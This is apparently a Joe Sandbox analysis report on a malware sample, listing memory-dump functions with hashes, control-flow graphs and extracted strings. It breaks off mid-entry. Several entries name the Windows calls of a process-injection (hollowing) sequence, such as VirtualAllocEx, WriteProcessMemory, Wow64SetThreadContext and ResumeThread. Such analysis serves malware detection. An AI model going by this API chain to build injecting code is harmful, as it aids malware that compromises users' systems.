                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2bed049492ec262762f72f287ec8c2d85ee70fc4a715cc941b00355cf7e2337d
                                                                            • Instruction ID: d2d0d61abfcfb062419f78c00255bfb1d3f3104e49d5560a2e8ad3f00e3dd65f
                                                                            • Opcode Fuzzy Hash: 2bed049492ec262762f72f287ec8c2d85ee70fc4a715cc941b00355cf7e2337d
                                                                            • Instruction Fuzzy Hash: C1910574E042088FDB08CFE9C8816DEFBF2EF89310F24842AD516AB264D7749946CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004414F0, Relevance: .2, Instructions: 201COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8947430ad82ef86c3d72ac420a7e6021301e73f4c85accaf90de53f978f70101
                                                                            • Instruction ID: 084d652bb1250c2532619d2e3061be9fd47118f2f9157c1581a360d60f116014
                                                                            • Opcode Fuzzy Hash: 8947430ad82ef86c3d72ac420a7e6021301e73f4c85accaf90de53f978f70101
                                                                            • Instruction Fuzzy Hash: 3A81E374E002189FDB08CFE9C9816DEFBF2EF88300F24842AD516AB264D7749946CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00441D51, Relevance: .1, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 56c103dfc4269546e7fb752303a5cc7362334e7baa5f09fe77800909527c2cd2
                                                                            • Instruction ID: eddacb96b5d377e4fad4a369d2c3452dae93b4d0c9cfedd4a9f18c2b9f031fd4
                                                                            • Opcode Fuzzy Hash: 56c103dfc4269546e7fb752303a5cc7362334e7baa5f09fe77800909527c2cd2
                                                                            • Instruction Fuzzy Hash: 905109B4E042198FDB08CFEAC9506EEFBF2FF89301F24C16AD815A7261D77859418B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037BBC0, Relevance: .1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d41a5d2ef4a63b35f8c3a209ec6a8623b81f7e2a5691450ec29e11c2f59ce623
                                                                            • Instruction ID: 017b75f90b017d32610ac7b0f511d4445bc37dc37ea66c83b1657f165ad31cf2
                                                                            • Opcode Fuzzy Hash: d41a5d2ef4a63b35f8c3a209ec6a8623b81f7e2a5691450ec29e11c2f59ce623
                                                                            • Instruction Fuzzy Hash: E13112B0D01219DFCB19DFA4D844AEEBBB2AF89304F10842ED415B7260DB785A45CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037BBC8, Relevance: .1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1cd07d742d06c6345ad001252b2ada2e27983ee294cbf6b9215fd65d8c336361
                                                                            • Instruction ID: 4025845b9af9d819c8b4316247246717f6b6f71cc2c7f13200554af31608e511
                                                                            • Opcode Fuzzy Hash: 1cd07d742d06c6345ad001252b2ada2e27983ee294cbf6b9215fd65d8c336361
                                                                            • Instruction Fuzzy Hash: 8E3100B0D01219DFCB19DFE5D844AEEFBB6AF89304F10842AE415B7260DB785A45CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00442752, Relevance: .1, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 77a0c98ff4bedac2acf738e03c9458ce7bfd57cdcf1f07ffcf6671c59f0ad5a4
                                                                            • Instruction ID: 77b9c16d3d32859716745b0f5a88447dd1a82a08c64872dab3286283eac41704
                                                                            • Opcode Fuzzy Hash: 77a0c98ff4bedac2acf738e03c9458ce7bfd57cdcf1f07ffcf6671c59f0ad5a4
                                                                            • Instruction Fuzzy Hash: 79312571E046588BEB18CFAAD8543DEFBF3AFC9300F14C16AD409A6264DB780A46CF41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00445E40, Relevance: .1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5a09f04fadb40f1712462fb33b8b70ff48d94a1cafc02673bdbb2b612222fc59
                                                                            • Instruction ID: 11301cdd41ee537798593b72725a0fccaccd566d2b16200726fa3caf842435d8
                                                                            • Opcode Fuzzy Hash: 5a09f04fadb40f1712462fb33b8b70ff48d94a1cafc02673bdbb2b612222fc59
                                                                            • Instruction Fuzzy Hash: 4921EA71E056588BEB18CFABC8406DEFBF7AFC9200F14C5BAC508A6265DB341A468F55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037BAC8, Relevance: .1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5bb628122b8d5717d9aa3d4307615309891e8a21a1e79140e3d8b1ac5dd0d799
                                                                            • Instruction ID: e4f7f9499a8961b79bd74b78c403891330300b3ca81b254cf9f0a9c566f52b3f
                                                                            • Opcode Fuzzy Hash: 5bb628122b8d5717d9aa3d4307615309891e8a21a1e79140e3d8b1ac5dd0d799
                                                                            • Instruction Fuzzy Hash: B0113771D042588FCF15DFA0C8557EEBBB1AF89300F1195AAD406B7291DB781E45CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037BA18, Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6696e2daa7e696663e2ab8c9540608db67f8df53e925c95c3acd82f3e10a3b8f
                                                                            • Instruction ID: dd3705a19bfd650063b297fc4fca848e8e3cf343caac866e2607e6e9dd0ba34d
                                                                            • Opcode Fuzzy Hash: 6696e2daa7e696663e2ab8c9540608db67f8df53e925c95c3acd82f3e10a3b8f
                                                                            • Instruction Fuzzy Hash: D0115671D082588FCF16DBA0C8557EEBBB1AF89300F1094AAC002B7291DB784E44CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037BA28, Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f12200235d2444a99663c545d7368fa6c55fd751549796026e0bba7f49bfc57b
                                                                            • Instruction ID: df3d254ae697bf51d058b271645dbdc63248a7481278f7f55ddbb6e1ca17d73b
                                                                            • Opcode Fuzzy Hash: f12200235d2444a99663c545d7368fa6c55fd751549796026e0bba7f49bfc57b
                                                                            • Instruction Fuzzy Hash: 11112A70E002198BDF18EFA5C845BEEBBB2AF89300F10946AD415B7290DB381E40CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037BAD8, Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6bd3214852bd139b442128ffc1541314be9a8d507bf65d680411b005402e3b40
                                                                            • Instruction ID: fa18b9227d73ba7a322e88135131f96b8c6c11cf8688fdc800ad41a2fde2c704
                                                                            • Opcode Fuzzy Hash: 6bd3214852bd139b442128ffc1541314be9a8d507bf65d680411b005402e3b40
                                                                            • Instruction Fuzzy Hash: 25110F70E002198BDB28DFA5C855BEEFBB1AF89301F10946AD815B7290DB781E40CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037D3F0, Relevance: 3.9, Strings: 3, Instructions: 130COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1237 37d3f0-37d418 1238 37d41d-37d420 1237->1238 1239 37d422 1238->1239 1240 37d429-37d444 call 37d5f0 call 37d6ca 1238->1240 1239->1240 1241 37d5b5 1239->1241 1242 37d4b5-37d4d6 1239->1242 1243 37d451-37d474 1239->1243 1244 37d549-37d594 1239->1244 1250 37d44a-37d44f 1240->1250 1246 37d5bc-37d5c3 1241->1246 1254 37d4ee-37d522 call 440218 1242->1254 1255 37d4d8-37d4de 1242->1255 1274 37d477 call 37f220 1243->1274 1275 37d477 call 37f0f9 1243->1275 1276 37d477 call 37f108 1243->1276 1267 37d59b-37d5a2 1244->1267 1250->1238 1266 37d528-37d532 1254->1266 1256 37d4e2-37d4e4 1255->1256 1257 37d4e0 1255->1257 1256->1254 1257->1254 1262 37d47d-37d489 1268 37d491-37d49e 1262->1268 1269 37d5c6-37d5ce 1266->1269 1270 37d538-37d544 1266->1270 1267->1269 1271 37d5a4-37d5b0 1267->1271 1268->1269 1272 37d4a4-37d4b0 1268->1272 1270->1238 1271->1238 1272->1238 1274->1262 1275->1262 1276->1262
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `!0m$`!0m$fCl
                                                                            • API String ID: 0-655585357
                                                                            • Opcode ID: c477ece5433b730df6efcc54d18ede40b07bb6303c2c4a4f81dcf3627a948d7b
                                                                            • Instruction ID: c4403b112706c55b708edc3dc13642830ffe82a34cdfd5c7b55bd178a27a9656
                                                                            • Opcode Fuzzy Hash: c477ece5433b730df6efcc54d18ede40b07bb6303c2c4a4f81dcf3627a948d7b
                                                                            • Instruction Fuzzy Hash: 4A419F74B00205CFDB25DBA5D8157AE76F6AF88304F108436E90ADB385DF789D41CBA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037D3E0, Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1445 37d3e0-37d418 1447 37d41d-37d420 1445->1447 1448 37d422 1447->1448 1449 37d429-37d444 call 37d5f0 call 37d6ca 1447->1449 1448->1449 1450 37d5b5 1448->1450 1451 37d4b5-37d4b8 1448->1451 1452 37d451-37d454 1448->1452 1453 37d549-37d587 1448->1453 1459 37d44a-37d44f 1449->1459 1455 37d5bc-37d5c3 1450->1455 1456 37d4c2-37d4c9 1451->1456 1458 37d45e 1452->1458 1473 37d58e-37d594 1453->1473 1461 37d4d4-37d4d6 1456->1461 1460 37d466-37d468 1458->1460 1459->1447 1468 37d472-37d474 1460->1468 1463 37d4ee-37d500 1461->1463 1464 37d4d8-37d4de 1461->1464 1472 37d50b-37d522 call 440218 1463->1472 1465 37d4e2-37d4e4 1464->1465 1466 37d4e0 1464->1466 1465->1463 1466->1463 1486 37d477 call 37f220 1468->1486 1487 37d477 call 37f0f9 1468->1487 1488 37d477 call 37f108 1468->1488 1471 37d47d-37d47f 1474 37d489 1471->1474 1475 37d528-37d532 1472->1475 1476 37d59b-37d5a2 1473->1476 1477 37d491-37d49e 1474->1477 1478 37d5c6-37d5ce 1475->1478 1479 37d538-37d544 1475->1479 1476->1478 1480 37d5a4-37d5b0 1476->1480 1477->1478 1481 37d4a4-37d4b0 1477->1481 1479->1447 1480->1447 1481->1447 1486->1471 1487->1471 1488->1471
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `!0m$fCl
                                                                            • API String ID: 0-1366227990
                                                                            • Opcode ID: d9fbb9bcbcc8620dac4c8e7786bd2dca2f442225b576726f420edf4abe702817
                                                                            • Instruction ID: 97968e337ee9844dd03ff79931e9a9787fc0632ab7e9e867ee784ed239c049b4
                                                                            • Opcode Fuzzy Hash: d9fbb9bcbcc8620dac4c8e7786bd2dca2f442225b576726f420edf4abe702817
                                                                            • Instruction Fuzzy Hash: DE41BE74B00205CFDB25DBA5D8167AE7BF6AF89304F108436E909DB381EB789D41CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037D6CA, Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1489 37d6ca-37d6f3 1490 37d729-37d761 1489->1490 1494 37d769-37d77c 1490->1494 1496 37d783-37d788 1494->1496 1497 37d6f5-37d6f8 1496->1497 1498 37d701-37d715 1497->1498 1499 37d6fa 1497->1499 1503 37d7e2-37d7e7 1498->1503 1504 37d71b-37d727 1498->1504 1499->1490 1499->1496 1499->1498 1500 37d78d-37d7a8 1499->1500 1507 37d7c0-37d7c2 1500->1507 1508 37d7aa-37d7b0 1500->1508 1504->1497 1509 37d7c4-37d7ca 1507->1509 1510 37d7da-37d7e1 1507->1510 1511 37d7b4-37d7b6 1508->1511 1512 37d7b2 1508->1512 1513 37d7ce-37d7d0 1509->1513 1514 37d7cc 1509->1514 1511->1507 1512->1507 1513->1510 1514->1510
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ID$,A
                                                                            • API String ID: 0-1239230618
                                                                            • Opcode ID: d47bc071736a233bd6a9ada079fd91ea73e87abdd0cbdfd39f5a5a3c4cf8580c
                                                                            • Instruction ID: b150c36f950ff6f873c7fddffb0216ad17371875b99e2ca1abbc10e8a8303f8a
                                                                            • Opcode Fuzzy Hash: d47bc071736a233bd6a9ada079fd91ea73e87abdd0cbdfd39f5a5a3c4cf8580c
                                                                            • Instruction Fuzzy Hash: DB313334B04244DFC7299FB8980067A37FAAF85304F10847AE60ADB395EB789C41C7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037CCC8, Relevance: 2.5, Strings: 2, Instructions: 29COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1515 37ccc8-37ccd8 1516 37ccdf-37cce9 1515->1516 1517 37ccda 1515->1517 1518 37cd0c 1516->1518 1519 37cceb-37ccf4 1516->1519 1517->1516 1522 37cd0f 1518->1522 1520 37ccf6-37ccf9 1519->1520 1521 37ccfb-37cd08 1519->1521 1523 37cd0a 1520->1523 1521->1523 1526 37cd0f call 37cd20 1522->1526 1527 37cd0f call 37cd9c 1522->1527 1523->1522 1524 37cd15-37cd1c 1526->1524 1527->1524
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `!0m$`!0m
                                                                            • API String ID: 0-1225930514
                                                                            • Opcode ID: 3825d6c13fb9fe83b7a17f73d9a0405e4a4e7393da1c0311cec9714526efaed7
                                                                            • Instruction ID: 3341c42067640349bf04299ce32ceb328aacebab3431a2a8bfe617b7a1062567
                                                                            • Opcode Fuzzy Hash: 3825d6c13fb9fe83b7a17f73d9a0405e4a4e7393da1c0311cec9714526efaed7
                                                                            • Instruction Fuzzy Hash: EEF0823491420CEFDB2ADB98E5546ADB77AAB85305F2190A8D40A27790CB345F81EB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044E400, Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1528 44e400-44e496 1530 44e4ad-44e4bb 1528->1530 1531 44e498-44e4aa 1528->1531 1532 44e4d2-44e50e 1530->1532 1533 44e4bd-44e4cf 1530->1533 1531->1530 1534 44e510-44e51f 1532->1534 1535 44e522-44e5ef CreateProcessW 1532->1535 1533->1532 1534->1535 1539 44e5f1-44e5f7 1535->1539 1540 44e5f8-44e6b7 1535->1540 1539->1540 1550 44e6ed-44e6f8 1540->1550 1551 44e6b9-44e6e2 1540->1551 1551->1550
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0044E5DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 800fa3200525e6c0a1ba71a053406de823cd6beaf4128db02792020cdd9b49d0
                                                                            • Instruction ID: 3014867a4243c67dceae586bcd53695db7aea591095b2010b4927246b098476a
                                                                            • Opcode Fuzzy Hash: 800fa3200525e6c0a1ba71a053406de823cd6beaf4128db02792020cdd9b49d0
                                                                            • Instruction Fuzzy Hash: 4181DF74D00229DFDB20CFA5C840BDEBBB5BF19304F1095AAE509B7250EB749A89DF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044EFA8, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1555 44efa8-44f017 1557 44f02e-44f08e WriteProcessMemory 1555->1557 1558 44f019-44f02b 1555->1558 1559 44f097-44f0d5 1557->1559 1560 44f090-44f096 1557->1560 1558->1557 1560->1559
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0044F07E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 0122888ed2e8235a016bee2cd9d22d277bc525280ff17a96916c116e72988581
                                                                            • Instruction ID: 9ef202ba63ae5a8697f23c3ab5c4a3deeb7fc85d3f7a7e49f99c3706e8225ef4
                                                                            • Opcode Fuzzy Hash: 0122888ed2e8235a016bee2cd9d22d277bc525280ff17a96916c116e72988581
                                                                            • Instruction Fuzzy Hash: 354178B5D012589FCF10CFA9D984ADEFBF1BB49314F24902AE918B7210D379AA45CF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044E970, Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1563 44e970-44ea35 ReadProcessMemory 1565 44ea37-44ea3d 1563->1565 1566 44ea3e-44ea7c 1563->1566 1565->1566
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0044EA25
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: edafa6cafa3d4ac0b9a806a0d27e9f5528f346a22fc3e947faf22f67b14e1209
                                                                            • Instruction ID: 0d21742ca047e99f89e24a296883b90f084459a86d1336584ef68c618404e40d
                                                                            • Opcode Fuzzy Hash: edafa6cafa3d4ac0b9a806a0d27e9f5528f346a22fc3e947faf22f67b14e1209
                                                                            • Instruction Fuzzy Hash: 654178B9D002589FCF10CFAAD884ADEFBB5BB19310F10A02AE814B7210D375AA45CF65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044EE98, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1569 44ee98-44ef55 VirtualAllocEx 1571 44ef57-44ef5d 1569->1571 1572 44ef5e-44ef94 1569->1572 1571->1572
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0044EF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: bca8e952924159a4ae048946adbe535fb80e7bafab143d0fe6445229a8ccebac
                                                                            • Instruction ID: b46b1c5b31de1cf12b356bfa2c7c1c79a39cf76a670204632a51a0139c4eb696
                                                                            • Opcode Fuzzy Hash: bca8e952924159a4ae048946adbe535fb80e7bafab143d0fe6445229a8ccebac
                                                                            • Instruction Fuzzy Hash: 4B3178B8D002589FCF10CFA9D884ADEFBB5BB19310F20A01AE814B7310D375A945CF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004491A8, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1575 4491a8-44925f VirtualProtect 1577 449261-449267 1575->1577 1578 449268-4492a4 1575->1578 1577->1578
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0044924F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 91eff4ba5944626a69b0b8999f2a4e47ad5efa4a23934f1f0fe18fd1920815f7
                                                                            • Instruction ID: 65899f9f38a8a95704036f2a3607aece08f59362b46c1f965079c70025347291
                                                                            • Opcode Fuzzy Hash: 91eff4ba5944626a69b0b8999f2a4e47ad5efa4a23934f1f0fe18fd1920815f7
                                                                            • Instruction Fuzzy Hash: 443199B9D002589FCF10CFA9E884ADEFBB4BB19310F24942AE814B7210D375AA45CF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044E858, Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1581 44e858-44e8bc 1583 44e8d3-44e91a Wow64SetThreadContext 1581->1583 1584 44e8be-44e8d0 1581->1584 1585 44e923-44e95b 1583->1585 1586 44e91c-44e922 1583->1586 1584->1583 1586->1585
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 0044E90A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 84678198285d55b8e5e6f2e2baec8b99ca44d753c0d686d4678b1a99b78e1834
                                                                            • Instruction ID: a65734617d2684b713d0d11fc3b055782ae92c9ae63c26d4d367fd206683c8fa
                                                                            • Opcode Fuzzy Hash: 84678198285d55b8e5e6f2e2baec8b99ca44d753c0d686d4678b1a99b78e1834
                                                                            • Instruction Fuzzy Hash: 2F318AB5D012589FDB10CFAAD884ADEFBF1BB49314F24902AE414B7250D378AA45CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044F1D0, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1589 44f1d0-44f25e ResumeThread 1591 44f267-44f295 1589->1591 1592 44f260-44f266 1589->1592 1592->1591
                                                                            APIs
                                                                            • ResumeThread.KERNELBASE(?), ref: 0044F24E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 39b136588a1aa79435d93d89b6f004537ffd43bf6674560cfa3a50c6282831f7
                                                                            • Instruction ID: 01223c4db221af44bb423c40d019dde205e2a9f5ce97b42893fb056581a615fe
                                                                            • Opcode Fuzzy Hash: 39b136588a1aa79435d93d89b6f004537ffd43bf6674560cfa3a50c6282831f7
                                                                            • Instruction Fuzzy Hash: 5A217AB8D002189FDB10CFA9E884ADEFBF4BB49314F24946AE814B7310D375A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00370B00, Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
